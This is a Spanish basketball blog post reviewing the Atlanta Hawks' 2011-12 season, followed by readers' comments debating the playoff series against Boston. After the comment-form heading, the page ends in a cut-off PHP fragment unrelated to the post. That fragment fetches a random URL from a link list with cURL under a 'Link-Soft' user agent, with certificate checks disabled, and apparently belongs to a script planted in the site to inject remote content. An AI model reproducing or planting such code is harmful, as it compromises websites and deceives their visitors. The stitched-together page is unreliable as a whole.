Atlanta Hawks: Bien

20 de July de 2012 por Esteban
La campaña de los Hawks fue buena por muchísimos motivos. Atlanta se encontraba en una especie de limbo, eran demasiado buenos para reconstruir pero no lo suficiente como para pensar mas allá de una segunda ronda. Sus posibilidades de mejora, dada su situación salarial, eran nulas a menos de que se produjeran algunas circunstancias. Debían dar en el clavo con los fichajes  (cuestión dificilísima dado que solo disponían de la mid level y excepciones de veteranos) y debían mantener a sus jugadores en condiciones óptimas. Consiguieron lo primero pero no lo segundo.

En primer lugar, al no tener el mínimo espacio salarial (cortesía de jojo), debían dar con la tecla al firmar contratos por el mínimo, e increíblemente lo hicieron. Por el mínimo de veterano firmaron a Green, McGrady, Radmanovic, Pargo y Stackhouse. Todos y cada uno han tenido oportunidad de ayudar al equipo en algún momento de la temporada regular, superando las expectativas, principalmente Willie Green, y algunos juegos puntuales de McGrady y Radmanovic. Hasta Eric Dampier se ganó más que un contrato de 10 días…

Que sus estrellas se mantengan sanas…  Aquí falló la ecuación y por ende no llegaron mas allá de lo que todos pronosticaban. La grave lesión de Al Horford se produjo cuando el equipo se encontraba con un 7-4 y si bien pelearon como leones y lograron la clasificación para playoffs, sin Horford su techo tenía toda la pinta de ser más bien bajo. Sin el dominicano se apoyaron en el temporadón de Josh Smith el cual, a pesar de jugar a gran nivel, no eligieron para el All-Star. Enojado, acabó protagonizando posiblemente la mejor temporada de su carrera. “J-Smoove” estuvo perfectamente secundado toda la temporada por el siempre cumplidor Joe Johnson (gran jugador sería si cobrara 10 millones al año) y Jeff Teague.

Con estos ingredientes terminaron la regular en un meritorio 5º puesto. Sin su interno all-star, es algo nada despreciable.

En PO se enfrentaron sin ventaja de campo a unos veteranos Celtics. Estuvieron a punto de dar la sorpresa y hubo un momento en que parecía que podían llevarse la serie. Comenzaron ganando a domicilio, gracias principalmente a exponencial Josh Smith (22 puntos y 18 rebotes), y perdieron el segundo partido, donde no pudieron con Pierce. De todas maneras el negocio estaba hecho. De ganar los dos juegos en Atlanta quedarían al borde del pase. Pero no, perdieron ambos juegos en Atlanta. El tercero en el tiempo extra y el cuarto con algunos minutitos de Hordford,  que en un ratito dio que hablar. La serie se mudaba nuevamente a Boston preparada para que los Celtics la liquidasen pero Al Hordford volvió para llevar de nuevo la serie a Atlanta, demostrando que de haber estado sano desde el primer juego, quizá ellos hubiesen jugado la final contra los Heat. En el sexto y a la postre definitivo partido, la victoria fue para Boston. Se acabó el sueño de los Hawks que se dejaron la serie en esos 3º y 4º partidos jugados en Atlanta.

Lo mejor: 

Sin un jugador All-star, quizá el segundo mejor center del Este, pudieron mantener el nivel de años anteriores, es decir el quinto puesto.  Creo que a más no podían aspirar sin Horford.

El establecimiento de Jeff Teague como estrella potencial. El año pasado jugó unos PO de ensueño y este año se confirmó como un base joven y talentoso que puede conducir este equipo en el futuro o que tiene un valor de mercado muy alto para hacer un trade por Howard.  Por explotar en los PO pasados, su impacto no fue tan grande, pero sin dudas puede tratarse de un caso LIN. De la casi nada al casi estrellato. Bien por la franquicia

A pesar de la temporada mediocre realizada por Joe Johnson y su pésimo contrato, consiguieron un comprador a cambio de muchos contratos bajos y a punto de terminar. También encontraron comprador para el encajado en la mediocridad Marvin Williams. El que parecía un eterno conjunto atado al limite salarial por los contratos de Williams y Johnson, se encontrará el próximo año comprometido únicamente con Hordford, y ni siquiera han tenido que aplicar la amnistía. Negocio redondo.

Lo peor:

El final triste de un proceso que años atrás apuntaba más alto. Después de tres años en segunda ronda, con un equipo tan joven, parece un fracaso terminarlo en primera.

La incertidumbre. Si bien es cierto que se limpiaron de malos contratos, también es cierto que los contratos que llegaron a cambio no les permitirán mantener el nivel y en un Este cada vez más competitivo, pueden quedar fuera de PO después de mucho tiempo.

Jugando al GM:

Había que buscar un perimetral urgente ¿O.J. Mayo? No, se decidieron por Lou Williams, un escolta con suficiente poder de fuego para mantenerse competitivo.

No hacer más cambios sería lo prudente. Dejar que se terminen todos los contratos y reiniciarse la próxima temporada. Lo que tienen no es tan malo. Quizá no tienen anotadores perimetrales de nivel, pero tienen dos muy buenos internos que al menos los meterán en la lucha por los PO. Habrá que ver como responde Lou Williams al ser la referencia ofensiva perimetral de un equipo (dudo a que salga del banco).

Como en otros análisis, la Coca Cola ya esta vendida aquí. Me gustan los tiradores Korver y Morrow,  ninguno ganará partidos por si solos pero son piezas validas. En la posición de base , con Teague y Harris, no son más que nadie pero no tienen tampoco que pasar vergüenza. Su dúo interno es de élite pero el resto de la plantilla la completan malos jugadores que les impedirán pelear más que por un séptimo puesto (Stevenson, Petro, Jenkins, etc).

Comenta

17 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    “En PO se enfrentaron sin ventaja de campo a unos veteranos Celtics y estuvieron a punto de dar la sorpresa y llevarse la serie.”

    Esto no es cierto, porque no estuvieron a punto de llevarse esa serie de ni de coña, tan solo ganaron un partido ahí para forzar el sexto pero por orgullo, nada más. No fueron equipo en los últimos cuartos y creo que ni siquiera pudieron forzar hasta el límite a los Celtics. Creo que te has crecido con esa aseveración, pero en general el análisis es bueno y estoy de acuerdo con muchas cosas. Quizá, la sensación que queda de esta estapa en los Hawks es que podían haber hecho mucho más, pero no sé si por conformismo, por malos movimientos en los despachos o porque creamos unas espectativas demasiado altas para estos jóvenes (que ya no lo son tanto) se estancaron y se dedicaron a llegar a primera o segunda ronda de playoffs todos los años pero nada más.

    Por último ,coincido con la nota. Un bien es lo que se merecen. Sobre todo, no ya por caer en primera ronda, sino porque lucharon durante todo el año con poquísimas cosas y con su jugador referencia en la zona lesionado. Tiene mérito. No estoy de acuerdo con alabar el rendimiento de Radmanovic y no incluir ni siquiera una mención para Ivan Johnson o Zaza Pachulia

      Citar

  2. Vader dice:
    #2

    Me ha gustado mucho el análisis pero me gustaria hacer un apunte… no me gusta la costumbre que teneis de dar la culpa a los jugadores de los contratos que tienen firmados, sobretodo aquellos que entendeis que estan sobrepagados.

    ¿Alguno de nosotros dira que no se le suben el sueldo?

    Las franquicias, los GM tienen la culpa de ello. Si los Hawks tenian poco margen de mejora no fue por culpa de JoJo sino de sus dirigentes. Lo mismo en NYK con Stat, etc…

      Citar

  3. txusma dice:
    #3

    Sancho88:
    “En PO se enfrentaron sin ventaja de campo a unos veteranos Celtics y estuvieron a punto de dar la sorpresa y llevarse la serie.”

    Esto no es cierto, porque no estuvieron a punto de llevarse esa serie de ni de coña, tan solo ganaron un partido ahí para forzar el sexto pero por orgullo, nada más.

    La frase es problema del editor. Lo siento. No sé si Esteban quería dar esa idea o si yo la he entendido mal. En cuanto aparezca y lo aclare lo cambio.

      Citar

  4. Sancho88 dice:
    #4

    Vaya, yo que lo decía nada más por joder, y resulta que no era de su cosecha… caxin les mengues. Bueno, no pudo ser la troleada por hoy… jejeje. por cierto, a ver si te paso el resumen de los bulls que prometí tenerlo para ayer y mira qué horas son… 11 días para cerrar y 9 resúmenes por publicar.. tu tun tu tun…. da tiempo o no?

      Citar

  5. txusma dice:
    #5

    He cambiado la frase. Releyendo el texto original creo q es mucho más fiel.

    Al final a lo mejor cerramos algo más tarde. Aunque claro, luego abriremos tb más tarde… 😀

      Citar

  6. JHC dice:
    #6

    respecto al año pasado creo que las cosas se hicieron bien la lesión de Horford nos privó de llegar a algo más, en cuanto a este próximo año no creo que hayamos perdido tampoco mucho nivel e incluso veo mejor banquillo recuperamos a Horford y ya sea louis o anthony morrow mejoran a Tracy como 6º hombre

    Además creo que somos un claro aspirante para hacernos con DH ahora que ha anunciado que no renovara con el equipo al que le traspasen y moviendonos bien incluso se podria hablar de traer a Paul…

    los movimientos de Ferry hasta el momento son para quitarse el sombrero, reconstruir sin dejar de luchar por los PO y poder soñar con un tridente Paul-Smith-Howard seria impresionante

      Citar

  7. Sancho88 dice:
    #7

    me encanta que la gente haga público que son de equipos perdedores. Mis respetos JHC. Entendamos por perdedores todo lo que no son Lakers, Celtics, etc. Siempre dije que molaría que la peña confesara aquí sus debilidades. Las mías ya las sabéis. Esteban, de qué puto equipo eres? Clippers no?

      Citar

  8. German dice:
    #8

    Solo apuntar que la ventaja de campo la tuvo Atlanta contra los Celtics y el tercer y cuarto juego fueron en el Garden.
    Fueron partidos parejos en su mayoria, si hubiera estado Horford al 100% quiza otra hubiera sido la historia… o quiza no porque los verdes siempre se las ingenian.

      Citar

  9. Esteban dice:
    #9

    Sancho88:
    me encanta que la gente haga público que son de equipos perdedores. Mis respetos JHC. Entendamos por perdedores todo lo que no son Lakers, Celtics, etc. Siempre dije que molaría que la peña confesara aquí sus debilidades. Las mías ya las sabéis. Esteban, de qué puto equipo eres? Clippers no?

    pacers! de la erade jackson, reggie, mullin, davis y smith, saltando del banco, best, rose, mckey, el otro davis, de los que sufrieron la L vale 4 de larry jhonson

      Citar

  10. Esteban dice:
    #10

    sancho, en realidad la serie no corrio mayor peligro para celtics mas alla de perder el primer juego, y despues mudarse 3-2 arriba a atlanta, donde se podia poner 3-3

    en cuanto a mcgrady, radmanovic y jerry, no fue gran gran cosa, pero realmente jugaron algunos buenos partidos en la regular, en mi opinion, muy superior a lo que podia esperar

      Citar

  11. Sancho88 dice:
    #11

    para mí, que radmanovic meta una canasta ya es un partido muy superior a lo que se podía esperar… y encima lo fichan los Bulls… por qué hay que sufrir esto en serio…

      Citar

  12. Txusma dice:
    #12

    Sancho88:
    para mí, que radmanovic meta una canasta ya es un partido muy superior a lo que se podía esperar… y encima lo fichan los Bulls… por qué hay que sufrir esto en serio…

    Los agentes de Radmanovic, Brown y esta gente deben ser buenísimos.

      Citar

  13. CAMPO2 dice:
    #13

    Pues yo soy de los Nets de la era de Kidd y Carter, y me he tragado unos cuantos años de mierda a base de gente como Petro, Farmar, Outlow… y ahora me tocara disfrutar un poco espero

      Citar

  14. Nacho dice:
    #14

    No se si soy yo, o ya estoy vetado por mis estupideces (cosa que podría entender), pero no mando los comentarios y me dicen que están… follón

      Citar

  15. Nacho dice:
    #15

    Nada, se me cuela el de la queja y no me entra el otro. Está equivocado lo de la ventaja de campo y los lugares de los partidos.

      Citar

  16. Nacho dice:
    #16

    1º y 2º en Atlanta. Victoria Hawk en el 1º y derrota en el 2º ante unos Celtics sin Rondo.
    3º y 4º en Boston, los verdes ganan los dos. 3-1.
    5º en Atlanta, victoria local por la mínima. 3-2.
    6º en el garden. Victoria verde. 4-2.

    Efectivamente Atlanta fue 5º, y Boston 4º, porque los verdes lideraron su división. Pero mejor porcentaje de victorias de los de Atlanta y por eso tuvieron ventaja de campo.
    Un saludo. Gran post, por otra parte.

      Citar

  17. MagicJohnson32 dice:
    #17

    Hola Nacho. He encontrado tus comentarios en el apartado de spam. Ni idea de por qué te los manda allí, pero avisa cuando te pase y te los rescatamos, jeje.

    Un saludo y disculpa por las molestias.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>